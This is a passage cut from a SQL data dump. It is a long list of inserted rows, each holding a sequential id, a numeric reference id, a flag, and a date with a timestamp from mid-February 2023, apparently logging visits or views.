22:33:03'),(69761,3764,1,'2023-02-13','2023-02-13 22:33:31'),(69762,4762,1,'2023-02-13','2023-02-13 23:18:53'),(69763,4963,1,'2023-02-14','2023-02-14 02:34:56'),(69764,80,1,'2023-02-14','2023-02-14 02:36:40'),(69765,4963,1,'2023-02-14','2023-02-14 02:36:56'),(69766,76,1,'2023-02-14','2023-02-14 02:37:25'),(69767,4963,1,'2023-02-14','2023-02-14 02:37:37'),(69768,1594,1,'2023-02-14','2023-02-14 03:09:12'),(69769,5163,1,'2023-02-14','2023-02-14 04:46:49'),(69770,80,1,'2023-02-14','2023-02-14 05:37:38'),(69771,4759,1,'2023-02-14','2023-02-14 05:43:20'),(69772,2804,1,'2023-02-14','2023-02-14 05:45:27'),(69773,3691,1,'2023-02-14','2023-02-14 05:50:04'),(69774,469,1,'2023-02-14','2023-02-14 07:02:32'),(69775,4457,1,'2023-02-14','2023-02-14 07:50:26'),(69776,5276,1,'2023-02-14','2023-02-14 08:25:38'),(69777,89,1,'2023-02-14','2023-02-14 08:46:59'),(69778,89,1,'2023-02-14','2023-02-14 08:47:29'),(69779,87,1,'2023-02-14','2023-02-14 10:28:26'),(69780,570,1,'2023-02-14','2023-02-14 10:39:13'),(69781,570,1,'2023-02-14','2023-02-14 10:40:03'),(69782,4551,1,'2023-02-14','2023-02-14 10:42:02'),(69783,1598,1,'2023-02-14','2023-02-14 11:11:40'),(69784,1594,1,'2023-02-14','2023-02-14 11:55:23'),(69785,4911,1,'2023-02-14','2023-02-14 12:29:27'),(69786,1594,1,'2023-02-14','2023-02-14 13:09:07'),(69787,4391,1,'2023-02-14','2023-02-14 13:12:45'),(69788,4688,1,'2023-02-14','2023-02-14 14:15:27'),(69789,2148,1,'2023-02-14','2023-02-14 14:38:52'),(69790,1718,1,'2023-02-14','2023-02-14 14:47:45'),(69791,3127,1,'2023-02-14','2023-02-14 15:40:36'),(69792,4966,1,'2023-02-14','2023-02-14 15:46:10'),(69793,4738,1,'2023-02-14','2023-02-14 15:50:23'),(69794,5271,1,'2023-02-14','2023-02-14 16:52:57'),(69795,1588,1,'2023-02-14','2023-02-14 19:04:30'),(69796,4520,1,'2023-02-14','2023-02-14 19:22:58'),(69797,80,1,'2023-02-14','2023-02-14 19:26:31'),(69798,4635,1,'2023-02-14','2023-02-14 20:03:41'),(69799,3117,1,'2023-02-14','2023-02-14 20:08:48'),(69800,84,1,'2023-02-14','2023-02-14 20:21:32'),(69801,3307,1,'2023-02-14','2023-02-14 20:24:22'),(69802,1722,1,'2023-02-14','2023-02-14 20:51:31'),(69803,1588,1,'2023-02-14','2023-02-14 20:52:58'),(69804,4391,1,'2023-02-14','2023-02-14 21:49:18'),(69805,1598,1,'2023-02-14','2023-02-14 21:50:41'),(69806,471,1,'2023-02-14','2023-02-14 22:47:05'),(69807,4323,1,'2023-02-14','2023-02-14 23:40:30'),(69808,3764,1,'2023-02-14','2023-02-14 23:44:06'),(69809,4963,1,'2023-02-14','2023-02-14 23:54:33'),(69810,4966,1,'2023-02-15','2023-02-15 00:08:35'),(69811,91,1,'2023-02-15','2023-02-15 04:41:39'),(69812,5157,1,'2023-02-15','2023-02-15 04:42:38'),(69813,5157,1,'2023-02-15','2023-02-15 04:42:39'),(69814,4556,1,'2023-02-15','2023-02-15 06:36:51'),(69815,4404,1,'2023-02-15','2023-02-15 07:13:20'),(69816,1602,1,'2023-02-15','2023-02-15 07:20:41'),(69817,4960,1,'2023-02-15','2023-02-15 07:39:42'),(69818,2411,1,'2023-02-15','2023-02-15 07:43:37'),(69819,108,1,'2023-02-15','2023-02-15 07:44:46'),(69820,1602,1,'2023-02-15','2023-02-15 11:22:44'),(69821,1610,1,'2023-02-15','2023-02-15 11:27:28'),(69822,4966,1,'2023-02-15','2023-02-15 11:33:28'),(69823,2751,1,'2023-02-15','2023-02-15 12:01:29'),(69824,2609,1,'2023-02-15','2023-02-15 12:48:16'),(69825,4457,1,'2023-02-15','2023-02-15 12:49:12'),(69826,3004,1,'2023-02-15','2023-02-15 13:03:59'),(69827,3004,1,'2023-02-15','2023-02-15 13:03:59'),(69828,1612,1,'2023-02-15','2023-02-15 13:05:08'),(69829,3004,1,'2023-02-15','2023-02-15 13:05:30'),(69830,4911,1,'2023-02-15','2023-02-15 13:27:33'),(69831,1586,1,'2023-02-15','2023-02-15 14:55:26'),(69832,1588,1,'2023-02-15','2023-02-15 15:53:53'),(69833,3698,1,'2023-02-15','2023-02-15 17:03:24'),(69834,2159,1,'2023-02-15','2023-02-15 17:20:00'),(69835,4966,1,'2023-02-15','2023-02-15 17:38:55'),(69836,1586,1,'2023-02-15','2023-02-15 19:10:18'),(69837,1586,1,'2023-02-15','2023-02-15 19:30:47'),(69838,1588,1,'2023-02-15','2023-02-15 19:39:14'),(69839,4960,1,'2023-02-15','2023-02-15 20:04:39'),(69840,4960,1,'2023-02-15','2023-02-15 20:05:30'),(69841,472,1,'2023-02-15','2023-02-15 20:15:28'),(69842,4911,1,'2023-02-15','2023-02-15 20:39:42'),(69843,1600,1,'2023-02-15','2023-02-15 20:54:57'),(69844,4703,1,'2023-02-15','2023-02-15 21:00:23'),(69845,1594,1,'2023-02-15','2023-02-15 21:18:27'),(69846,2911,1,'2023-02-15','2023-02-15 21:39:47'),(69847,5153,1,'2023-02-15','2023-02-15 21:56:35'),(69848,4428,1,'2023-02-15','2023-02-15 22:03:48'),(69849,4966,1,'2023-02-15','2023-02-15 22:05:23'),(69850,4960,1,'2023-02-15','2023-02-15 22:05:46'),(69851,4428,1,'2023-02-15','2023-02-15 22:06:15'),(69852,4428,1,'2023-02-15','2023-02-15 22:07:47'),(69853,5122,1,'2023-02-15','2023-02-15 22:59:20'),(69854,76,1,'2023-02-15','2023-02-15 23:09:59'),(69855,4930,1,'2023-02-15','2023-02-15 23:10:14'),(69856,5268,1,'2023-02-15','2023-02-15 23:14:05'),(69857,76,1,'2023-02-15','2023-02-15 23:36:13'),(69858,5122,1,'2023-02-15','2023-02-15 23:36:19'),(69859,1606,1,'2023-02-16','2023-02-16 01:05:00'),(69860,1544,1,'2023-02-16','2023-02-16 01:07:09'),(69861,1594,1,'2023-02-16','2023-02-16 02:05:03'),(69862,4963,1,'2023-02-16','2023-02-16 02:21:17'),(69863,1592,1,'2023-02-16','2023-02-16 02:52:42'),(69864,2159,1,'2023-02-16','2023-02-16 03:25:42'),(69865,4348,1,'2023-02-16','2023-02-16 05:24:04'),(69866,1600,1,'2023-02-16','2023-02-16 07:08:05'),(69867,4674,1,'2023-02-16','2023-02-16 07:22:41'),(69868,1612,1,'2023-02-16','2023-02-16 07:36:54'),(69869,4911,1,'2023-02-16','2023-02-16 08:05:44'),(69870,5071,1,'2023-02-16','2023-02-16 08:34:36'),(69871,3004,1,'2023-02-16','2023-02-16 08:37:39'),(69872,1608,1,'2023-02-16','2023-02-16 09:16:38'),(69873,4685,1,'2023-02-16','2023-02-16 09:24:35'),(69874,5080,1,'2023-02-16','2023-02-16 09:33:40'),(69875,1602,1,'2023-02-16','2023-02-16 09:50:58'),(69876,1602,1,'2023-02-16','2023-02-16 09:51:51'),(69877,1602,1,'2023-02-16','2023-02-16 09:51:57'),(69878,4776,1,'2023-02-16','2023-02-16 10:12:03'),(69879,4668,1,'2023-02-16','2023-02-16 10:23:54'),(69880,4688,1,'2023-02-16','2023-02-16 10:25:11'),(69881,4363,1,'2023-02-16','2023-02-16 10:26:59'),(69882,3240,1,'2023-02-16','2023-02-16 10:45:02'),(69883,1586,1,'2023-02-16','2023-02-16 11:13:46'),(69884,4238,1,'2023-02-16','2023-02-16 11:17:16'),(69885,4874,1,'2023-02-16','2023-02-16 11:36:26'),(69886,5128,1,'2023-02-16','2023-02-16 11:58:16'),(69887,1602,1,'2023-02-16','2023-02-16 12:10:21'),(69888,1724,1,'2023-02-16','2023-02-16 12:15:55'),(69889,1584,1,'2023-02-16','2023-02-16 12:16:49'),(69890,4391,1,'2023-02-16','2023-02-16 12:20:40'),(69891,1594,1,'2023-02-16','2023-02-16 12:46:21'),(69892,1745,1,'2023-02-16','2023-02-16 13:02:42'),(69893,1604,1,'2023-02-16','2023-02-16 13:03:57'),(69894,68,1,'2023-02-16','2023-02-16 13:04:14'),(69895,1604,1,'2023-02-16','2023-02-16 13:04:19'),(69896,1745,1,'2023-02-16','2023-02-16 13:04:34'),(69897,2904,1,'2023-02-16','2023-02-16 13:09:31'),(69898,5163,1,'2023-02-16','2023-02-16 13:11:50'),(69899,1602,1,'2023-02-16','2023-02-16 13:14:30'),(69900,3102,1,'2023-02-16','2023-02-16 13:25:39'),(69901,473,1,'2023-02-16','2023-02-16 14:09:33'),(69902,87,1,'2023-02-16','2023-02-16 14:09:42'),(69903,488,1,'2023-02-16','2023-02-16 14:09:56'),(69904,68,1,'2023-02-16','2023-02-16 14:20:25'),(69905,1610,1,'2023-02-16','2023-02-16 14:23:36'),(69906,468,1,'2023-02-16','2023-02-16 14:27:27'),(69907,3764,1,'2023-02-16','2023-02-16 14:46:16'),(69908,4911,1,'2023-02-16','2023-02-16 15:52:20'),(69909,1743,1,'2023-02-16','2023-02-16 16:02:32'),(69910,1602,1,'2023-02-16','2023-02-16 16:37:17'),(69911,3534,1,'2023-02-16','2023-02-16 16:49:56'),(69912,1745,1,'2023-02-16','2023-02-16 20:50:32'),(69913,5037,1,'2023-02-16','2023-02-16 21:05:33'),(69914,5037,1,'2023-02-16','2023-02-16 21:10:57'),(69915,5024,1,'2023-02-16','2023-02-16 21:11:14'),(69916,4960,1,'2023-02-16','2023-02-16 21:16:52'),(69917,1728,1,'2023-02-16','2023-02-16 21:25:21'),(69918,1745,1,'2023-02-16','2023-02-16 21:34:21'),(69919,3045,1,'2023-02-16','2023-02-16 22:45:51'),(69920,91,1,'2023-02-16','2023-02-16 22:55:57'),(69921,76,1,'2023-02-16','2023-02-16 23:35:32'),(69922,4341,1,'2023-02-16','2023-02-16 23:40:46'),(69923,3004,1,'2023-02-17','2023-02-17 01:51:20'),(69924,5163,1,'2023-02-17','2023-02-17 03:19:48'),(69925,2457,1,'2023-02-17','2023-02-17 03:25:27'),(69926,68,1,'2023-02-17','2023-02-17 05:09:38'),(69927,2309,1,'2023-02-17','2023-02-17 05:31:39'),(69928,5163,1,'2023-02-17','2023-02-17 06:39:40'),(69929,4622,1,'2023-02-17','2023-02-17 07:39:40'),(69930,72,1,'2023-02-17','2023-02-17 08:39:47'),(69931,3707,1,'2023-02-17','2023-02-17 09:04:00'),(69932,4363,1,'2023-02-17','2023-02-17 09:18:19'),(69933,468,1,'2023-02-17','2023-02-17 09:38:53'),(69934,76,1,'2023-02-17','2023-02-17 09:39:25'),(69935,91,1,'2023-02-17','2023-02-17 10:09:59'),(69936,4874,1,'2023-02-17','2023-02-17 10:11:29'),(69937,91,1,'2023-02-17','2023-02-17 10:46:29'),(69938,5259,1,'2023-02-17','2023-02-17 10:47:47'),(69939,4529,1,'2023-02-17','2023-02-17 10:54:25'),(69940,4802,1,'2023-02-17','2023-02-17 11:02:22'),(69941,4963,1,'2023-02-17','2023-02-17 11:37:07'),(69942,4556,1,'2023-02-17','2023-02-17 12:12:54'),(69943,4556,1,'2023-02-17','2023-02-17 12:35:43'),(69944,4556,1,'2023-02-17','2023-02-17 12:37:29'),(69945,4556,1,'2023-02-17','2023-02-17 13:15:16'),(69946,91,1,'2023-02-17','2023-02-17 13:17:24'),(69947,87,1,'2023-02-17','2023-02-17 13:19:55'),(69948,91,1,'2023-02-17','2023-02-17 13:20:20'),(69949,4911,1,'2023-02-17','2023-02-17 15:19:00'),(69950,3102,1,'2023-02-17','2023-02-17 16:10:13'),(69951,4977,1,'2023-02-17','2023-02-17 16:29:35'),(69952,3781,1,'2023-02-17','2023-02-17 17:07:59'),(69953,4566,1,'2023-02-17','2023-02-17 17:10:11'),(69954,1602,1,'2023-02-17','2023-02-17 17:12:50'),(69955,87,1,'2023-02-17','2023-02-17 17:25:14'),(69956,2904,1,'2023-02-17','2023-02-17 17:38:24'),(69957,4966,1,'2023-02-17','2023-02-17 17:48:55'),(69958,4874,1,'2023-02-17','2023-02-17 18:38:40'),(69959,91,1,'2023-02-17','2023-02-17 18:38:41'),(69960,5067,1,'2023-02-17','2023-02-17 18:39:16'),(69961,3287,1,'2023-02-17','2023-02-17 18:40:15'),(69962,5067,1,'2023-02-17','2023-02-17 18:48:08'),(69963,5042,1,'2023-02-17','2023-02-17 18:49:06'),(69964,5042,1,'2023-02-17','2023-02-17 18:49:06'),(69965,5042,1,'2023-02-17','2023-02-17 18:51:09'),(69966,3781,1,'2023-02-17','2023-02-17 20:49:28'),(69967,80,1,'2023-02-17','2023-02-17 21:15:53'),(69968,68,1,'2023-02-17','2023-02-17 21:15:59'),(69969,108,1,'2023-02-17','2023-02-17 21:16:03'),(69970,4404,1,'2023-02-17','2023-02-17 21:56:42'),(69971,2410,1,'2023-02-17','2023-02-17 22:25:06'),(69972,4996,1,'2023-02-17','2023-02-17 22:55:04'),(69973,3004,1,'2023-02-18','2023-02-18 01:03:55'),(69974,72,1,'2023-02-18','2023-02-18 01:16:46'),(69975,2419,1,'2023-02-18','2023-02-18 01:24:18'),(69976,3226,1,'2023-02-18','2023-02-18 01:54:26'),(69977,4709,1,'2023-02-18','2023-02-18 03:15:18'),(69978,4373,1,'2023-02-18','2023-02-18 03:58:21'),(69979,1722,1,'2023-02-18','2023-02-18 04:45:00'),(69980,91,1,'2023-02-18','2023-02-18 04:46:21'),(69981,68,1,'2023-02-18','2023-02-18 04:48:23'),(69982,3313,1,'2023-02-18','2023-02-18 05:30:16'),(69983,4703,1,'2023-02-18','2023-02-18 05:54:45'),(69984,1594,1,'2023-02-18','2023-02-18 06:06:15'),(69985,1600,1,'2023-02-18','2023-02-18 06:11:18'),(69986,3724,1,'2023-02-18','2023-02-18 06:16:55'),(69987,3226,1,'2023-02-18','2023-02-18 06:19:33'),(69988,472,1,'2023-02-18','2023-02-18 06:43:45'),(69989,4779,1,'2023-02-18','2023-02-18 07:08:07'),(69990,4944,1,'2023-02-18','2023-02-18 07:25:13'),(69991,3735,1,'2023-02-18','2023-02-18 08:02:16'),(69992,1582,1,'2023-02-18','2023-02-18 08:55:15'),(69993,3781,1,'2023-02-18','2023-02-18 09:37:41'),(69994,4618,1,'2023-02-18','2023-02-18 09:41:53'),(69995,1598,1,'2023-02-18','2023-02-18 10:13:07'),(69996,4963,1,'2023-02-18','2023-02-18 10:24:58'),(69997,4944,1,'2023-02-18','2023-02-18 11:15:11'),(69998,3498,1,'2023-02-18','2023-02-18 11:57:43'),(69999,1582,1,'2023-02-18','2023-02-18 14:02:51'),(70000,3764,1,'2023-02-18','2023-02-18 14:09:31'),(70001,1596,1,'2023-02-18','2023-02-18 14:29:33'),(70002,1598,1,'2023-02-18','2023-02-18 14:34:19'),(70003,4960,1,'2023-02-18','2023-02-18 14:52:22'),(70004,2769,1,'2023-02-18','2023-02-18 15:57:09'),(70005,2309,1,'2023-02-18','2023-02-18 16:45:24'),(70006,4436,1,'2023-02-18','2023-02-18 17:49:43'),(70007,2609,1,'2023-02-18','2023-02-18 18:47:53'),(70008,4238,1,'2023-02-18','2023-02-18 18:55:39'),(70009,1604,1,'2023-02-18','2023-02-18 19:35:14'),(70010,4980,1,'2023-02-18','2023-02-18 21:20:13'),(70011,4368,1,'2023-02-18','2023-02-18 21:46:07'),(70012,3781,1,'2023-02-18','2023-02-18 21:47:44'),(70013,3004,1,'2023-02-18','2023-02-18 21:54:22'),(70014,4938,1,'2023-02-18','2023-02-18 22:09:04'),(70015,4938,1,'2023-02-18','2023-02-18 22:11:03'),(70016,74,1,'2023-02-18','2023-02-18 22:11:40'),(70017,1582,1,'2023-02-18','2023-02-18 22:11:57'),(70018,4938,1,'2023-02-18','2023-02-18 22:12:03'),(70019,5122,1,'2023-02-18','2023-02-18 22:37:51'),(70020,470,1,'2023-02-18','2023-02-18 23:06:47'),(70021,3251,1,'2023-02-18','2023-02-18 23:35:33'),(70022,4323,1,'2023-02-19','2023-02-19 03:29:34'),(70023,1596,1,'2023-02-19','2023-02-19 05:35:34'),(70024,3316,1,'2023-02-19','2023-02-19 07:20:30'),(70025,80,1,'2023-02-19','2023-02-19 07:23:49'),(70026,5080,1,'2023-02-19','2023-02-19 07:56:29'),(70027,3280,1,'2023-02-19','2023-02-19 08:50:37'),(70028,5163,1,'2023-02-19','2023-02-19 09:32:28'),(70029,4911,1,'2023-02-19','2023-02-19 09:33:02'),(70030,4911,1,'2023-02-19','2023-02-19 09:38:39'),(70031,4911,1,'2023-02-19','2023-02-19 09:39:29'),(70032,3781,1,'2023-02-19','2023-02-19 11:06:25'),(70033,72,1,'2023-02-19','2023-02-19 11:26:16'),(70034,4412,1,'2023-02-19','2023-02-19 11:38:56'),(70035,4911,1,'2023-02-19','2023-02-19 13:07:47'),(70036,4412,1,'2023-02-19','2023-02-19 13:19:18'),(70037,4911,1,'2023-02-19','2023-02-19 13:38:54'),(70038,4802,1,'2023-02-19','2023-02-19 14:15:58'),(70039,4238,1,'2023-02-19','2023-02-19 14:26:29'),(70040,1768,1,'2023-02-19','2023-02-19 14:55:19'),(70041,4960,1,'2023-02-19','2023-02-19 14:58:28'),(70042,4963,1,'2023-02-19','2023-02-19 15:47:03'),(70043,4930,1,'2023-02-19','2023-02-19 15:47:25'),(70044,4963,1,'2023-02-19','2023-02-19 15:47:33'),(70045,4930,1,'2023-02-19','2023-02-19 15:47:40'),(70046,4963,1,'2023-02-19','2023-02-19 15:47:41'),(70047,4963,1,'2023-02-19','2023-02-19 15:47:48'),(70048,3083,1,'2023-02-19','2023-02-19 16:07:54'),(70049,2159,1,'2023-02-19','2023-02-19 16:30:43'),(70050,1737,1,'2023-02-19','2023-02-19 16:52:50'),(70051,4400,1,'2023-02-19','2023-02-19 17:15:21'),(70052,2395,1,'2023-02-19','2023-02-19 17:18:59'),(70053,2804,1,'2023-02-19','2023-02-19 17:39:05'),(70054,2775,1,'2023-02-19','2023-02-19 18:00:21'),(70055,3438,1,'2023-02-19','2023-02-19 18:01:36'),(70056,4524,1,'2023-02-19','2023-02-19 18:24:05'),(70057,1602,1,'2023-02-19','2023-02-19 21:10:34'),(70058,76,1,'2023-02-19','2023-02-19 21:57:23'),(70059,5080,1,'2023-02-19','2023-02-19 22:18:01'),(70060,4412,1,'2023-02-19','2023-02-19 23:10:32'),(70061,2309,1,'2023-02-19','2023-02-19 23:18:16'),(70062,4703,1,'2023-02-20','2023-02-20 01:21:42'),(70063,89,1,'2023-02-20','2023-02-20 01:23:57'),(70064,4612,1,'2023-02-20','2023-02-20 03:06:26'),(70065,4412,1,'2023-02-20','2023-02-20 04:12:07'),(70066,3752,1,'2023-02-20','2023-02-20 04:23:01'),(70067,3749,1,'2023-02-20','2023-02-20 04:42:15'),(70068,3269,1,'2023-02-20','2023-02-20 05:01:26'),(70069,68,1,'2023-02-20','2023-02-20 06:01:15'),(70070,4382,1,'2023-02-20','2023-02-20 06:31:25'),(70071,4520,1,'2023-02-20','2023-02-20 07:16:37'),(70072,1614,1,'2023-02-20','2023-02-20 07:56:24'),(70073,3498,1,'2023-02-20','2023-02-20 08:46:26'),(70074,1588,1,'2023-02-20','2023-02-20 09:19:35'),(70075,4457,1,'2023-02-20','2023-02-20 10:20:57'),(70076,3090,1,'2023-02-20','2023-02-20 11:22:18'),(70077,4412,1,'2023-02-20','2023-02-20 11:23:06'),(70078,5122,1,'2023-02-20','2023-02-20 11:45:02'),(70079,1614,1,'2023-02-20','2023-02-20 11:57:51'),(70080,3251,1,'2023-02-20','2023-02-20 12:19:53'),(70081,3694,1,'2023-02-20','2023-02-20 13:05:06'),(70082,3486,1,'2023-02-20','2023-02-20 13:07:50'),(70083,4966,1,'2023-02-20','2023-02-20 13:10:45'),(70084,1592,1,'2023-02-20','2023-02-20 13:17:42'),(70085,1594,1,'2023-02-20','2023-02-20 13:31:55'),(70086,4960,1,'2023-02-20','2023-02-20 14:10:53'),(70087,1600,1,'2023-02-20','2023-02-20 15:11:42'),(70088,3691,1,'2023-02-20','2023-02-20 17:07:09'),(70089,4412,1,'2023-02-20','2023-02-20 17:07:33'),(70090,1594,1,'2023-02-20','2023-02-20 17:48:58'),(70091,87,1,'2023-02-20','2023-02-20 18:48:27'),(70092,1724,1,'2023-02-20','2023-02-20 19:02:25'),(70093,1588,1,'2023-02-20','2023-02-20 19:15:21'),(70094,4416,1,'2023-02-20','2023-02-20 19:26:03'),(70095,4960,1,'2023-02-20','2023-02-20 19:47:32'),(70096,4960,1,'2023-02-20','2023-02-20 20:36:19'),(70097,76,1,'2023-02-20','2023-02-20 20:37:50'),(70098,4960,1,'2023-02-20','2023-02-20 20:39:05'),(70099,76,1,'2023-02-20','2023-02-20 20:39:11'),(70100,4960,1,'2023-02-20','2023-02-20 20:39:36'),(70101,4776,1,'2023-02-20','2023-02-20 20:55:43'),(70102,4776,1,'2023-02-20','2023-02-20 20:57:01'),(70103,5054,1,'2023-02-20','2023-02-20 21:29:40'),(70104,80,1,'2023-02-20','2023-02-20 22:15:57'),(70105,4966,1,'2023-02-20','2023-02-20 22:30:40'),(70106,4911,1,'2023-02-20','2023-02-20 22:40:24'),(70107,4412,1,'2023-02-20','2023-02-20 22:48:42'),(70108,5080,1,'2023-02-20','2023-02-20 22:51:34'),(70109,4966,1,'2023-02-20','2023-02-20 23:38:14'),(70110,4966,1,'2023-02-21','2023-02-21 01:20:18'),(70111,4691,1,'2023-02-21','2023-02-21 03:32:39'),(70112,470,1,'2023-02-21','2023-02-21 03:48:09'),(70113,80,1,'2023-02-21','2023-02-21 04:12:53'),(70114,5071,1,'2023-02-21','2023-02-21 04:44:22'),(70115,68,1,'2023-02-21','2023-02-21 06:07:07'),(70116,3680,1,'2023-02-21','2023-02-21 06:57:49'),(70117,4963,1,'2023-02-21','2023-02-21 07:26:57'),(70118,80,1,'2023-02-21','2023-02-21 07:29:02'),(70119,1544,1,'2023-02-21','2023-02-21 07:53:31'),(70120,3482,1,'2023-02-21','2023-02-21 08:19:58'),(70121,1586,1,'2023-02-21','2023-02-21 09:13:10'),(70122,4335,1,'2023-02-21','2023-02-21 09:38:11'),(70123,4301,1,'2023-02-21','2023-02-21 09:41:05'),(70124,4412,1,'2023-02-21','2023-02-21 09:45:55'),(70125,4489,1,'2023-02-21','2023-02-21 09:49:13'),(70126,2297,1,'2023-02-21','2023-02-21 09:58:51'),(70127,2503,1,'2023-02-21','2023-02-21 10:02:03'),(70128,5280,1,'2023-02-21','2023-02-21 10:14:47'),(70129,5280,1,'2023-02-21','2023-02-21 10:23:38'),(70130,5280,1,'2023-02-21','2023-02-21 10:23:40'),(70131,3691,1,'2023-02-21','2023-02-21 10:41:26'),(70132,5005,1,'2023-02-21','2023-02-21 11:14:24'),(70133,2148,1,'2023-02-21','2023-02-21 11:28:01'),(70134,4520,1,'2023-02-21','2023-02-21 11:38:05'),(70135,3691,1,'2023-02-21','2023-02-21 12:14:20'),(70136,5280,1,'2023-02-21','2023-02-21 12:46:06'),(70137,4301,1,'2023-02-21','2023-02-21 12:50:17'),(70138,4938,1,'2023-02-21','2023-02-21 13:45:59'),(70139,1711,1,'2023-02-21','2023-02-21 14:20:17'),(70140,3541,1,'2023-02-21','2023-02-21 15:40:01'),(70141,4556,1,'2023-02-21','2023-02-21 15:43:29'),(70142,3030,1,'2023-02-21','2023-02-21 16:21:14'),(70143,1703,1,'2023-02-21','2023-02-21 16:27:21'),(70144,4457,1,'2023-02-21','2023-02-21 16:37:07'),(70145,4966,1,'2023-02-21','2023-02-21 17:14:19'),(70146,2904,1,'2023-02-21','2023-02-21 17:15:09'),(70147,2904,1,'2023-02-21','2023-02-21 17:15:39'),(70148,4966,1,'2023-02-21','2023-02-21 17:15:52'),(70149,4301,1,'2023-02-21','2023-02-21 17:57:21'),(70150,1728,1,'2023-02-21','2023-02-21 17:58:04'),(70151,2558,1,'2023-02-21','2023-02-21 18:01:20'),(70152,2152,1,'2023-02-21','2023-02-21 18:36:30'),(70153,467,1,'2023-02-21','2023-02-21 19:17:20'),(70154,4963,1,'2023-02-21','2023-02-21 19:38:22'),(70155,76,1,'2023-02-21','2023-02-21 19:39:59'),(70156,1586,1,'2023-02-21','2023-02-21 20:07:35'),(70157,4338,1,'2023-02-21','2023-02-21 20:21:00'),(70158,1718,1,'2023-02-21','2023-02-21 20:44:45'),(70159,1610,1,'2023-02-21','2023-02-21 23:00:42'),(70160,5080,1,'2023-02-21','2023-02-21 23:39:12'),(70161,4335,1,'2023-02-21','2023-02-21 23:51:08'),(70162,3247,1,'2023-02-22','2023-02-22 00:19:35'),(70163,3092,1,'2023-02-22','2023-02-22 00:44:18'),(70164,2769,1,'2023-02-22','2023-02-22 01:31:56'),(70165,4966,1,'2023-02-22','2023-02-22 04:14:53'),(70166,2156,1,'2023-02-22','2023-02-22 04:49:13'),(70167,4862,1,'2023-02-22','2023-02-22 06:47:38'),(70168,3774,1,'2023-02-22','2023-02-22 07:08:28'),(70169,5050,1,'2023-02-22','2023-02-22 07:50:55'),(70170,4768,1,'2023-02-22','2023-02-22 09:26:17'),(70171,4768,1,'2023-02-22','2023-02-22 09:31:53'),(70172,1592,1,'2023-02-22','2023-02-22 10:48:47'),(70173,1544,1,'2023-02-22','2023-02-22 11:53:56'),(70174,1586,1,'2023-02-22','2023-02-22 11:56:43'),(70175,1594,1,'2023-02-22','2023-02-22 12:27:37'),(70176,87,1,'2023-02-22','2023-02-22 12:48:45'),(70177,68,1,'2023-02-22','2023-02-22 12:52:08'),(70178,68,1,'2023-02-22','2023-02-22 12:52:34'),(70179,3079,1,'2023-02-22','2023-02-22 13:40:24'),(70180,4436,1,'2023-02-22','2023-02-22 13:58:10'),(70181,4966,1,'2023-02-22','2023-02-22 14:33:47'),(70182,1586,1,'2023-02-22','2023-02-22 15:32:56'),(70183,4966,1,'2023-02-22','2023-02-22 16:23:44'),(70184,1586,1,'2023-02-22','2023-02-22 16:26:08'),(70185,1586,1,'2023-02-22','2023-02-22 16:43:54'),(70186,80,1,'2023-02-22','2023-02-22 16:45:12'),(70187,80,1,'2023-02-22','2023-02-22 16:51:49'),(70188,80,1,'2023-02-22','2023-02-22 17:26:14'),(70189,4709,1,'2023-02-22','2023-02-22 17:37:41'),(70190,1596,1,'2023-02-22','2023-02-22 17:50:40'),(70191,3107,1,'2023-02-22','2023-02-22 17:53:23'),(70192,4420,1,'2023-02-22','2023-02-22 18:04:20'),(70193,1586,1,'2023-02-22','2023-02-22 19:09:46'),(70194,4753,1,'2023-02-22','2023-02-22 19:41:59'),(70195,76,1,'2023-02-22','2023-02-22 19:45:59'),(70196,2309,1,'2023-02-22','2023-02-22 20:06:58'),(70197,2309,1,'2023-02-22','2023-02-22 20:08:28'),(70198,4436,1,'2023-02-22','2023-02-22 20:55:18'),(70199,76,1,'2023-02-22','2023-02-22 21:23:21'),(70200,68,1,'2023-02-22','2023-02-22 21:23:31'),(70201,89,1,'2023-02-22','2023-02-22 21:27:15'),(70202,108,1,'2023-02-22','2023-02-22 21:27:36'),(70203,68,1,'2023-02-22','2023-02-22 21:27:57'),(70204,91,1,'2023-02-22','2023-02-22 21:28:05'),(70205,4542,1,'2023-02-22','2023-02-22 21:28:40'),(70206,91,1,'2023-02-22','2023-02-22 21:32:13'),(70207,1747,1,'2023-02-22','2023-02-22 21:32:24'),(70208,4792,1,'2023-02-22','2023-02-22 21:49:36'),(70209,4938,1,'2023-02-22','2023-02-22 21:57:47'),(70210,80,1,'2023-02-22','2023-02-22 22:00:07'),(70211,4457,1,'2023-02-22','2023-02-22 22:06:41'),(70212,1713,1,'2023-02-22','2023-02-22 22:08:12'),(70213,5024,1,'2023-02-22','2023-02-22 22:26:47'),(70214,5076,1,'2023-02-22','2023-02-22 22:45:28'),(70215,4747,1,'2023-02-22','2023-02-22 22:50:28'),(70216,4591,1,'2023-02-22','2023-02-22 23:03:42'),(70217,4830,1,'2023-02-22','2023-02-22 23:20:04'),(70218,4733,1,'2023-02-22','2023-02-22 23:38:16'),(70219,4797,1,'2023-02-22','2023-02-22 23:43:10'),(70220,4573,1,'2023-02-22','2023-02-22 23:49:49'),(70221,2457,1,'2023-02-23','2023-02-23 00:08:20'),(70222,474,1,'2023-02-23','2023-02-23 00:18:16'),(70223,4657,1,'2023-02-23','2023-02-23 00:24:58'),(70224,4424,1,'2023-02-23','2023-02-23 00:25:50'),(70225,1596,1,'2023-02-23','2023-02-23 00:26:12'),(70226,470,1,'2023-02-23','2023-02-23 00:55:34'),(70227,4412,1,'2023-02-23','2023-02-23 01:32:56'),(70228,1602,1,'2023-02-23','2023-02-23 01:58:16'),(70229,3273,1,'2023-02-23','2023-02-23 02:16:57'),(70230,470,1,'2023-02-23','2023-02-23 03:02:26'),(70231,3275,1,'2023-02-23','2023-02-23 03:25:06'),(70232,1544,1,'2023-02-23','2023-02-23 03:49:50'),(70233,1734,1,'2023-02-23','2023-02-23 04:20:08'),(70234,4492,1,'2023-02-23','2023-02-23 04:36:15'),(70235,4944,1,'2023-02-23','2023-02-23 04:43:19'),(70236,3788,1,'2023-02-23','2023-02-23 05:02:58'),(70237,4703,1,'2023-02-23','2023-02-23 05:34:40'),(70238,3541,1,'2023-02-23','2023-02-23 05:43:03'),(70239,4911,1,'2023-02-23','2023-02-23 05:57:02'),(70240,4561,1,'2023-02-23','2023-02-23 06:03:29'),(70241,1722,1,'2023-02-23','2023-02-23 06:15:04'),(70242,3764,1,'2023-02-23','2023-02-23 06:17:50'),(70243,1728,1,'2023-02-23','2023-02-23 06:30:55'),(70244,1697,1,'2023-02-23','2023-02-23 06:31:54'),(70245,3714,1,'2023-02-23','2023-02-23 06:38:50'),(70246,3038,1,'2023-02-23','2023-02-23 